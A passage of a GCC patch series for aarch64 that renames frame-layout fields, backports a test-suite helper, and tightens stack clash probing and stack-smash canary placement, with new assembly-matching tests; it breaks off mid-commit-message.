+ 		     + cfun->machine->frame.saved_regs_size, 512)
+ 	   && !(cfun->calls_alloca
+-		&& known_lt (cfun->machine->frame.hard_fp_offset,
++		&& known_lt (cfun->machine->frame.bytes_above_hard_fp,
+ 			     max_push_offset)))
+     {
+       /* Frame with small area below the saved registers:
+@@ -4797,14 +4797,14 @@ aarch64_layout_frame (void)
+ 	 stp reg3, reg4, [sp, bytes_below_hard_fp + 16]  */
+       cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
+       cfun->machine->frame.callee_offset
+-	= cfun->machine->frame.frame_size - cfun->machine->frame.hard_fp_offset;
++	= cfun->machine->frame.frame_size - cfun->machine->frame.bytes_above_hard_fp;
+     }
+-  else if (cfun->machine->frame.hard_fp_offset.is_constant (&const_fp_offset)
++  else if (cfun->machine->frame.bytes_above_hard_fp.is_constant (&const_fp_offset)
+ 	   && const_fp_offset < max_push_offset)
+     {
+       /* Frame with large area below the saved registers, but with a
+ 	 small area above:
+-	 stp reg1, reg2, [sp, -hard_fp_offset]!
++	 stp reg1, reg2, [sp, -bytes_above_hard_fp]!
+ 	 stp reg3, reg4, [sp, 16]
+ 	 sub sp, sp, bytes_below_hard_fp  */
+       cfun->machine->frame.callee_adjust = const_fp_offset;
+@@ -4814,12 +4814,13 @@ aarch64_layout_frame (void)
+   else
+     {
+       /* General case:
+-	 sub sp, sp, hard_fp_offset
++	 sub sp, sp, bytes_above_hard_fp
+ 	 stp x29, x30, [sp, 0]
+ 	 add x29, sp, 0
+ 	 stp reg3, reg4, [sp, 16]
+ 	 sub sp, sp, bytes_below_hard_fp  */
+-      cfun->machine->frame.initial_adjust = cfun->machine->frame.hard_fp_offset;
++      cfun->machine->frame.initial_adjust
++	= cfun->machine->frame.bytes_above_hard_fp;
+       cfun->machine->frame.final_adjust
+ 	= cfun->machine->frame.frame_size - cfun->machine->frame.initial_adjust;
+     }
+@@ -8563,10 +8564,10 @@ aarch64_initial_elimination_offset (unsigned from, unsigned to)
+   if (to == HARD_FRAME_POINTER_REGNUM)
+     {
+       if (from == ARG_POINTER_REGNUM)
+-	return cfun->machine->frame.hard_fp_offset;
++	return cfun->machine->frame.bytes_above_hard_fp;
+ 
+       if (from == FRAME_POINTER_REGNUM)
+-	return cfun->machine->frame.hard_fp_offset
++	return cfun->machine->frame.bytes_above_hard_fp
+ 	       - cfun->machine->frame.bytes_above_locals;
+     }
+ 
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index a079a88b4f4..eab6da84a02 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -724,10 +724,10 @@ struct GTY (()) aarch64_frame
+      STACK_BOUNDARY.  */
+   poly_int64 bytes_above_locals;
+ 
+-  /* Offset from the base of the frame (incomming SP) to the
+-     hard_frame_pointer.  This value is always a multiple of
++  /* The number of bytes between the hard_frame_pointer and the top of
++     the frame (the incomming SP).  This value is always a multiple of
+      STACK_BOUNDARY.  */
+-  poly_int64 hard_fp_offset;
++  poly_int64 bytes_above_hard_fp;
+ 
+   /* The size of the frame.  This value is the offset from base of the
+      frame (incomming SP) to the stack_pointer.  This value is always
+-- 
+2.34.1
+
+
+From eb2271eb6bb68ec3c9aa9ae4746ea1ee5f18874a Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Thu, 22 Jun 2023 22:26:30 +0100
+Subject: [PATCH 05/10] aarch64: Tweak frame_size comment
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch fixes another case in which a value was described with
+an “upside-down� view.
+
+gcc/
+	* config/aarch64/aarch64.h (aarch64_frame::frame_size): Tweak comment.
+---
+ gcc/config/aarch64/aarch64.h | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index eab6da84a02..7c4b65ec55b 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -729,8 +729,8 @@ struct GTY (()) aarch64_frame
+      STACK_BOUNDARY.  */
+   poly_int64 bytes_above_hard_fp;
+ 
+-  /* The size of the frame.  This value is the offset from base of the
+-     frame (incomming SP) to the stack_pointer.  This value is always
++  /* The size of the frame, i.e. the number of bytes between the bottom
++     of the outgoing arguments and the incoming SP.  This value is always
+      a multiple of STACK_BOUNDARY.  */
+   poly_int64 frame_size;
+ 
+-- 
+2.34.1
+
+
+From cfed3b87e9351edff1568ade4ef666edc9887639 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 15 Aug 2023 19:05:30 +0100
+Subject: [PATCH 06/10] Backport check-function-bodies support
+
+---
+ gcc/testsuite/lib/scanasm.exp | 191 ++++++++++++++++++++++++++++++++++
+ 1 file changed, 191 insertions(+)
+
+diff --git a/gcc/testsuite/lib/scanasm.exp b/gcc/testsuite/lib/scanasm.exp
+index 35ccbc86fc0..c9af27bf47a 100644
+--- a/gcc/testsuite/lib/scanasm.exp
++++ b/gcc/testsuite/lib/scanasm.exp
+@@ -546,3 +546,194 @@ proc scan-lto-assembler { args } {
+     verbose "output_file: $output_file"
+     dg-scan "scan-lto-assembler" 1 $testcase $output_file $args
+ }
++
++# Read assembly file FILENAME and store a mapping from function names
++# to function bodies in array RESULT.  FILENAME has already been uploaded
++# locally where necessary and is known to exist.
++
++proc parse_function_bodies { filename result } {
++    upvar $result up_result
++
++    # Regexp for the start of a function definition (name in \1).
++    set label {^([a-zA-Z_]\S+):$}
++
++    # Regexp for the end of a function definition.
++    set terminator {^\s*\.size}
++
++    # Regexp for lines that aren't interesting.
++    set fluff {^\s*(?:\.|//|@|$)}
++
++    set fd [open $filename r]
++    set in_function 0
++    while { [gets $fd line] >= 0 } {
++	if { [regexp $label $line dummy function_name] } {
++	    set in_function 1
++	    set function_body ""
++	} elseif { $in_function } {
++	    if { [regexp $terminator $line] } {
++		set up_result($function_name) $function_body
++		set in_function 0
++	    } elseif { ![regexp $fluff $line] } {
++		append function_body $line "\n"
++	    }
++	}
++    }
++    close $fd
++}
++
++# FUNCTIONS is an array that maps function names to function bodies.
++# Return true if it contains a definition of function NAME and if
++# that definition matches BODY_REGEXP.
++
++proc check_function_body { functions name body_regexp } {
++    upvar $functions up_functions
++
++    if { ![info exists up_functions($name)] } {
++	return 0
++    }
++    set fn_res [regexp "^$body_regexp\$" $up_functions($name)]
++    if { !$fn_res } {
++      verbose -log "body: $body_regexp"
++      verbose -log "against: $up_functions($name)"
++    }
++    return $fn_res
++}
++
++# Check the implementations of functions against expected output.  Used as:
++#
++# { dg-do { check-function-bodies PREFIX TERMINATOR[ OPTION[ SELECTOR]] } }
++#
++# See sourcebuild.texi for details.
++
++proc check-function-bodies { args } {
++    if { [llength $args] < 2 } {
++	error "too few arguments to check-function-bodies"
++    }
++    if { [llength $args] > 4 } {
++	error "too many arguments to check-function-bodies"
++    }
++
++    if { [llength $args] >= 3 } {
++	set required_flags [lindex $args 2]
++
++	upvar 2 dg-extra-tool-flags extra_tool_flags
++	set flags $extra_tool_flags
++
++	global torture_current_flags
++	if { [info exists torture_current_flags] } {
++	    append flags " " $torture_current_flags
++	}
++	foreach required_flag $required_flags {
++	    switch -- $required_flag {
++		target -
++		xfail {
++		    error "misplaced $required_flag in check-function-bodies"
++		}
++	    }
++	}
++	foreach required_flag $required_flags {
++	    if { ![regexp " $required_flag " $flags] } {
++		return
++	    }
++	}
++    }
++
++    set xfail_all 0
++    if { [llength $args] >= 4 } {
++	switch [dg-process-target [lindex $args 3]] {
++	    "S" { }
++	    "N" { return }
++	    "F" { set xfail_all 1 }
++	    "P" { }
++	}
++    }
++
++    set testcase [testname-for-summary]
++    # The name might include a list of options; extract the file name.
++    set filename [lindex $testcase 0]
++
++    global srcdir
++    set input_filename "$srcdir/$filename"
++    set output_filename "[file rootname [file tail $filename]].s"
++
++    set prefix [lindex $args 0]
++    set prefix_len [string length $prefix]
++    set terminator [lindex $args 1]
++    if { [string equal $terminator ""] } {
++	set terminator "*/"
++    }
++    set terminator_len [string length $terminator]
++
++    set have_bodies 0
++    if { [is_remote host] } {
++	remote_upload host "$filename"
++    }
++    if { [file exists $output_filename] } {
++	parse_function_bodies $output_filename functions
++	set have_bodies 1
++    } else {
++	verbose -log "$testcase: output file does not exist"
++    }
++
++    set count 0
++    set function_regexp ""
++    set label {^(\S+):$}
++
++    set lineno 1
++    set fd [open $input_filename r]
++    set in_function 0
++    while { [gets $fd line] >= 0 } {
++	if { [string equal -length $prefix_len $line $prefix] } {
++	    set line [string trim [string range $line $prefix_len end]]
++	    if { !$in_function } {
++		if { [regexp "^(.*?\\S)\\s+{(.*)}\$" $line dummy \
++			  line selector] } {
++		    set selector [dg-process-target $selector]
++		} else {
++		    set selector "P"
++		}
++		if { ![regexp $label $line dummy function_name] } {
++		    close $fd
++		    error "check-function-bodies: line $lineno does not have a function label"
++		}
++		set in_function 1
++		set function_regexp ""
++	    } elseif { [string equal $line "("] } {
++		append function_regexp "(?:"
++	    } elseif { [string equal $line "|"] } {
++		append function_regexp "|"
++	    } elseif { [string equal $line ")"] } {
++		append function_regexp ")"
++	    } elseif { [string equal $line "..."] } {
++		append function_regexp ".*"
++	    } else {
++		append function_regexp "\t" $line "\n"
++	    }
++	} elseif { [string equal -length $terminator_len $line $terminator] } {
++	    if { ![string equal $selector "N"] } {
++		if { $xfail_all || [string equal $selector "F"] } {
++		    setup_xfail "*-*-*"
++		}
++		set testname "$testcase check-function-bodies $function_name"
++		if { !$have_bodies } {
++		    unresolved $testname
++		} elseif { [check_function_body functions $function_name \
++				$function_regexp] } {
++		    pass $testname
++		} else {
++		    fail $testname
++		}
++	    }
++	    set in_function 0
++	    incr count
++	}
++	incr lineno
++    }
++    close $fd
++    if { $in_function } {
++	error "check-function-bodies: missing \"$terminator\""
++    }
++    if { $count == 0 } {
++	error "check-function-bodies: no matches found"
++    }
++}
+-- 
+2.34.1
+
+
+From 4dd8925d95d3d6d89779b494b5f4cfadcf9fa96e Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 15:11:44 +0100
+Subject: [PATCH 07/10] aarch64: Tweak stack clash boundary condition
+
+The AArch64 ABI says that, when stack clash protection is used,
+there can be a maximum of 1KiB of unprobed space at sp on entry
+to a function.  Therefore, we need to probe when allocating
+>= guard_size - 1KiB of data (>= rather than >).  This is what
+GCC does.
+
+If an allocation is exactly guard_size bytes, it is enough to allocate
+those bytes and probe once at offset 1024.  It isn't possible to use a
+single probe at any other offset: higher would conmplicate later code,
+by leaving more unprobed space than usual, while lower would risk
+leaving an entire page unprobed.  For simplicity, the code probes all
+allocations at offset 1024.
+
+Some register saves also act as probes.  If we need to allocate
+more space below the last such register save probe, we need to
+probe the allocation if it is > 1KiB.  Again, this allocation is
+then sometimes (but not always) probed at offset 1024.  This sort of
+allocation is currently only used for outgoing arguments, which are
+rarely this big.
+
+However, the code also probed if this final outgoing-arguments
+allocation was == 1KiB, rather than just > 1KiB.  This isn't
+necessary, since the register save then probes at offset 1024
+as required.  Continuing to probe allocations of exactly 1KiB
+would complicate later patches.
+
+gcc/
+	* config/aarch64/aarch64.c (aarch64_allocate_and_probe_stack_space):
+	Don't probe final allocations that are exactly 1KiB in size (after
+	unprobed space above the final allocation has been deducted).
+
+gcc/testsuite/
+	* gcc.target/aarch64/stack-check-prologue-17.c: New test.
+---
+ gcc/config/aarch64/aarch64.c                  |  6 +-
+ .../aarch64/stack-check-prologue-17.c         | 55 +++++++++++++++++++
+ 2 files changed, 60 insertions(+), 1 deletion(-)
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 2681e0c2bb9..4c9e11cd7cf 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -5506,6 +5506,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+   HOST_WIDE_INT guard_size
+     = 1 << PARAM_VALUE (PARAM_STACK_CLASH_PROTECTION_GUARD_SIZE);
+   HOST_WIDE_INT guard_used_by_caller = STACK_CLASH_CALLER_GUARD;
++  HOST_WIDE_INT byte_sp_alignment = STACK_BOUNDARY / BITS_PER_UNIT;
++  gcc_assert (multiple_p (poly_size, byte_sp_alignment));
+   /* When doing the final adjustment for the outgoing argument size we can't
+      assume that LR was saved at position 0.  So subtract it's offset from the
+      ABI safe buffer so that we don't accidentally allow an adjustment that
+@@ -5513,7 +5515,9 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+      probing.  */
+   HOST_WIDE_INT min_probe_threshold
+     = final_adjustment_p
+-      ? guard_used_by_caller - cfun->machine->frame.reg_offset[LR_REGNUM]
++      ? (guard_used_by_caller
++	 + byte_sp_alignment
++	 - cfun->machine->frame.reg_offset[LR_REGNUM])
+       : guard_size - guard_used_by_caller;
+ 
+   poly_int64 frame_size = cfun->machine->frame.frame_size;
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+new file mode 100644
+index 00000000000..0d8a25d73a2
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+@@ -0,0 +1,55 @@
++/* { dg-options "-O2 -fstack-clash-protection -fomit-frame-pointer --param stack-clash-protection-guard-size=12" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++void f(int, ...);
++void g();
++
++/*
++** test1:
++**	...
++**	str	x30, \[sp\]
++**	sub	sp, sp, #1024
++**	cbnz	w0, .*
++**	bl	g
++**	...
++*/
++int test1(int z) {
++  __uint128_t x = 0;
++  int y[0x400];
++  if (z)
++    {
++      f(0, 0, 0, 0, 0, 0, 0, &y,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x);
++    }
++  g();
++  return 1;
++}
++
++/*
++** test2:
++**	...
++**	str	x30, \[sp\]
++**	sub	sp, sp, #1040
++**	str	xzr, \[sp\]
++**	cbnz	w0, .*
++**	bl	g
++**	...
++*/
++int test2(int z) {
++  __uint128_t x = 0;
++  int y[0x400];
++  if (z)
++    {
++      f(0, 0, 0, 0, 0, 0, 0, &y,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x);
++    }
++  g();
++  return 1;
++}
+-- 
+2.34.1
+
+
+From 12517baf6c88447e3bda3a459ac4c29d61f84e6c Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 15:12:55 +0100
+Subject: [PATCH 08/10] aarch64: Put LR save probe in first 16 bytes
+
+-fstack-clash-protection uses the save of LR as a probe for the next
+allocation.  The next allocation could be:
+
+* another part of the static frame, e.g. when allocating SVE save slots
+  or outgoing arguments
+
+* an alloca in the same function
+
+* an allocation made by a callee function
+
+However, when -fomit-frame-pointer is used, the LR save slot is placed
+above the other GPR save slots.  It could therefore be up to 80 bytes
+above the base of the GPR save area (which is also the hard fp address).
+
+aarch64_allocate_and_probe_stack_space took this into account when
+deciding how much subsequent space could be allocated without needing
+a probe.  However, it interacted badly with:
+
+      /* If doing a small final adjustment, we always probe at offset 0.
+	 This is done to avoid issues when LR is not at position 0 or when
+	 the final adjustment is smaller than the probing offset.  */
+      else if (final_adjustment_p && rounded_size == 0)
+	residual_probe_offset = 0;
+
+which forces any allocation that is smaller than the guard page size
+to be probed at offset 0 rather than the usual offset 1024.  It was
+therefore possible to construct cases in which we had:
+
+* a probe using LR at SP + 80 bytes (or some other value >= 16)
+* an allocation of the guard page size - 16 bytes
+* a probe at SP + 0
+
+which allocates guard page size + 64 consecutive unprobed bytes.
+
+This patch requires the LR probe to be in the first 16 bytes of the
+save area when stack clash protection is active.  Doing it
+unconditionally would cause code-quality regressions.
+
+gcc/
+	* config/aarch64/aarch64.c (aarch64_layout_frame): Ensure that
+	the LR save slot is in the first 16 bytes of the register save area.
+	(aarch64_allocate_and_probe_stack_space): Remove workaround for
+	when LR was not in the first 16 bytes.
+
+gcc/testsuite/
+	* gcc.target/aarch64/stack-check-prologue-18.c: New test.
+---
+ gcc/config/aarch64/aarch64.c                  |  50 +++++----
+ .../aarch64/stack-check-prologue-18.c         | 100 ++++++++++++++++++
+ 2 files changed, 127 insertions(+), 23 deletions(-)
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 4c9e11cd7cf..1e8467fdd03 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4686,15 +4686,31 @@ aarch64_layout_frame (void)
+ 
+   cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
+ 
++#define ALLOCATE_GPR_SLOT(REGNO)					\
++  do									\
++    {									\
++      cfun->machine->frame.reg_offset[REGNO] = offset;			\
++      if (cfun->machine->frame.wb_candidate1 == INVALID_REGNUM)		\
++	cfun->machine->frame.wb_candidate1 = (REGNO);			\
++      else if (cfun->machine->frame.wb_candidate2 == INVALID_REGNUM)	\
++	cfun->machine->frame.wb_candidate2 = (REGNO);			\
++      offset += UNITS_PER_WORD;						\
++    }									\
++  while (0)
++
+   if (cfun->machine->frame.emit_frame_chain)
+     {
+       /* FP and LR are placed in the linkage record.  */
+-      cfun->machine->frame.reg_offset[R29_REGNUM] = 0;
+-      cfun->machine->frame.wb_candidate1 = R29_REGNUM;
+-      cfun->machine->frame.reg_offset[R30_REGNUM] = UNITS_PER_WORD;
+-      cfun->machine->frame.wb_candidate2 = R30_REGNUM;
+-      offset = 2 * UNITS_PER_WORD;
++      ALLOCATE_GPR_SLOT (R29_REGNUM);
++      ALLOCATE_GPR_SLOT (R30_REGNUM);
+     }
++  else if (flag_stack_clash_protection
++	   && cfun->machine->frame.reg_offset[R30_REGNUM] == SLOT_REQUIRED)
++    /* Put the LR save slot first, since it makes a good choice of probe
++       for stack clash purposes.  The idea is that the link register usually
++       has to be saved before a call anyway, and so we lose little by
++       stopping it from being individually shrink-wrapped.  */
++    ALLOCATE_GPR_SLOT (R30_REGNUM);
+ 
+   /* With stack-clash, LR must be saved in non-leaf functions.  */
+   gcc_assert (crtl->is_leaf
+@@ -4704,14 +4720,9 @@ aarch64_layout_frame (void)
+   /* Now assign stack slots for them.  */
+   for (regno = R0_REGNUM; regno <= R30_REGNUM; regno++)
+     if (cfun->machine->frame.reg_offset[regno] == SLOT_REQUIRED)
+-      {
+-	cfun->machine->frame.reg_offset[regno] = offset;
+-	if (cfun->machine->frame.wb_candidate1 == INVALID_REGNUM)
+-	  cfun->machine->frame.wb_candidate1 = regno;
+-	else if (cfun->machine->frame.wb_candidate2 == INVALID_REGNUM)
+-	  cfun->machine->frame.wb_candidate2 = regno;
+-	offset += UNITS_PER_WORD;
+-      }
++      ALLOCATE_GPR_SLOT (regno);
++
++#undef ALLOCATE_GPR_SLOT
+ 
+   HOST_WIDE_INT max_int_offset = offset;
+   offset = ROUND_UP (offset, STACK_BOUNDARY / BITS_PER_UNIT);
+@@ -5508,16 +5519,9 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+   HOST_WIDE_INT guard_used_by_caller = STACK_CLASH_CALLER_GUARD;
+   HOST_WIDE_INT byte_sp_alignment = STACK_BOUNDARY / BITS_PER_UNIT;
+   gcc_assert (multiple_p (poly_size, byte_sp_alignment));
+-  /* When doing the final adjustment for the outgoing argument size we can't
+-     assume that LR was saved at position 0.  So subtract it's offset from the
+-     ABI safe buffer so that we don't accidentally allow an adjustment that
+-     would result in an allocation larger than the ABI buffer without
+-     probing.  */
+   HOST_WIDE_INT min_probe_threshold
+     = final_adjustment_p
+-      ? (guard_used_by_caller
+-	 + byte_sp_alignment
+-	 - cfun->machine->frame.reg_offset[LR_REGNUM])
++      ? guard_used_by_caller + byte_sp_alignment
+       : guard_size - guard_used_by_caller;
+ 
+   poly_int64 frame_size = cfun->machine->frame.frame_size;
+@@ -5697,8 +5701,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+       if (final_adjustment_p && rounded_size != 0)
+ 	min_probe_threshold = 0;
+       /* If doing a small final adjustment, we always probe at offset 0.
+-	 This is done to avoid issues when LR is not at position 0 or when
+-	 the final adjustment is smaller than the probing offset.  */
++	 This is done to avoid issues when the final adjustment is smaller
++	 than the probing offset.  */
+       else if (final_adjustment_p && rounded_size == 0)
+ 	residual_probe_offset = 0;
+ 
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+new file mode 100644
+index 00000000000..82447d20fff
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+@@ -0,0 +1,100 @@
++/* { dg-options "-O2 -fstack-clash-protection -fomit-frame-pointer --param stack-clash-protection-guard-size=12" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++void f(int, ...);
++void g();
++
++/*
++** test1:
++**	...
++**	str	x30, \[sp\]
++**	sub	sp, sp, #4064
++**	str	xzr, \[sp\]
++**	cbnz	w0, .*
++**	bl	g
++**	...
++**	str	x26, \[sp, #?4128\]
++**	...
++*/
++int test1(int z) {
++  __uint128_t x = 0;
++  int y[0x400];
++  if (z)
++    {
++      asm volatile ("" :::
++		    "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
++      f(0, 0, 0, 0, 0, 0, 0, &y,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x);
++    }
++  g();
++  return 1;
++}
++
++/*
++** test2:
++**	...
++**	str	x30, \[sp\]
++**	sub	sp, sp, #1040
++**	str	xzr, \[sp\]
++**	cbnz	w0, .*
++**	bl	g
++**	...
++*/
++int test2(int z) {
++  __uint128_t x = 0;
++  int y[0x400];
++  if (z)
++    {
++      asm volatile ("" :::
++		    "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
++      f(0, 0, 0, 0, 0, 0, 0, &y,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x);
++    }
++  g();
++  return 1;
++}
++
++/*
++** test3:
++**	...
++**	str	x30, \[sp\]
++**	sub	sp, sp, #1024
++**	cbnz	w0, .*
++**	bl	g
++**	...
++*/
++int test3(int z) {
++  __uint128_t x = 0;
++  int y[0x400];
++  if (z)
++    {
++      asm volatile ("" :::
++		    "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
++      f(0, 0, 0, 0, 0, 0, 0, &y,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++	x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x);
++    }
++  g();
++  return 1;
++}
+-- 
+2.34.1
+
+
+From f2684e63652bb251d22c79e40081c646df1f36b6 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 8 Aug 2023 01:57:26 +0100
+Subject: [PATCH 09/10] aarch64: Simplify probe of final frame allocation
+
+Previous patches ensured that the final frame allocation only needs
+a probe when the size is strictly greater than 1KiB.  It's therefore
+safe to use the normal 1024 probe offset in all cases.
+
+The main motivation for doing this is to simplify the code and
+remove the number of special cases.
+
+gcc/
+	* config/aarch64/aarch64.c (aarch64_allocate_and_probe_stack_space):
+	Always probe the residual allocation at offset 1024, asserting
+	that that is in range.
+
+gcc/testsuite/
+	* gcc.target/aarch64/stack-check-prologue-17.c: Expect the probe
+	to be at offset 1024 rather than offset 0.
+	* gcc.target/aarch64/stack-check-prologue-18.c: Likewise.
+---
+ gcc/config/aarch64/aarch64.c                         | 12 ++++--------
+ .../gcc.target/aarch64/stack-check-prologue-17.c     |  2 +-
+ .../gcc.target/aarch64/stack-check-prologue-18.c     |  7 +++++--
+ 3 files changed, 10 insertions(+), 11 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 1e8467fdd03..705f719a2ea 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -5695,16 +5695,12 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+      are still safe.  */
+   if (residual)
+     {
+-      HOST_WIDE_INT residual_probe_offset = guard_used_by_caller;
++      gcc_assert (guard_used_by_caller + byte_sp_alignment <= size);
++
+       /* If we're doing final adjustments, and we've done any full page
+ 	 allocations then any residual needs to be probed.  */
+       if (final_adjustment_p && rounded_size != 0)
+ 	min_probe_threshold = 0;
+-      /* If doing a small final adjustment, we always probe at offset 0.
+-	 This is done to avoid issues when the final adjustment is smaller
+-	 than the probing offset.  */
+-      else if (final_adjustment_p && rounded_size == 0)
+-	residual_probe_offset = 0;
+ 
+       aarch64_sub_sp (temp1, temp2, residual, frame_related_p);
+       if (residual >= min_probe_threshold)
+@@ -5715,8 +5711,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ 		     HOST_WIDE_INT_PRINT_DEC " bytes, probing will be required."
+ 		     "\n", residual);
+ 
+-	    emit_stack_probe (plus_constant (Pmode, stack_pointer_rtx,
+-					     residual_probe_offset));
++	  emit_stack_probe (plus_constant (Pmode, stack_pointer_rtx,
++					   guard_used_by_caller));
+ 	  emit_insn (gen_blockage ());
+ 	}
+     }
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+index 0d8a25d73a2..f0ec1389771 100644
+--- a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+@@ -33,7 +33,7 @@ int test1(int z) {
+ **	...
+ **	str	x30, \[sp\]
+ **	sub	sp, sp, #1040
+-**	str	xzr, \[sp\]
++**	str	xzr, \[sp, #?1024\]
+ **	cbnz	w0, .*
+ **	bl	g
+ **	...
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+index 82447d20fff..71d33ba34e9 100644
+--- a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+@@ -8,8 +8,9 @@ void g();
+ ** test1:
+ **	...
+ **	str	x30, \[sp\]
++**	...
+ **	sub	sp, sp, #4064
+-**	str	xzr, \[sp\]
++**	str	xzr, \[sp, #?1024\]
+ **	cbnz	w0, .*
+ **	bl	g
+ **	...
+@@ -49,8 +50,9 @@ int test1(int z) {
+ ** test2:
+ **	...
+ **	str	x30, \[sp\]
++**	...
+ **	sub	sp, sp, #1040
+-**	str	xzr, \[sp\]
++**	str	xzr, \[sp, #?1024\]
+ **	cbnz	w0, .*
+ **	bl	g
+ **	...
+@@ -77,6 +79,7 @@ int test2(int z) {
+ ** test3:
+ **	...
+ **	str	x30, \[sp\]
++**	...
+ **	sub	sp, sp, #1024
+ **	cbnz	w0, .*
+ **	bl	g
+-- 
+2.34.1
+
+
+From bf3eeaa0182a92987570d9c787bd45079eebf528 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Thu, 15 Jun 2023 19:16:52 +0100
+Subject: [PATCH 10/10] aarch64: Make stack smash canary protect saved
+ registers
+
+AArch64 normally puts the saved registers near the bottom of the frame,
+immediately above any dynamic allocations.  But this means that a
+stack-smash attack on those dynamic allocations could overwrite the
+saved registers without needing to reach as far as the stack smash
+canary.
+
+The same thing could also happen for variable-sized arguments that are
+passed by value, since those are allocated before a call and popped on
+return.
+
+This patch avoids that by putting the locals (and thus the canary) below
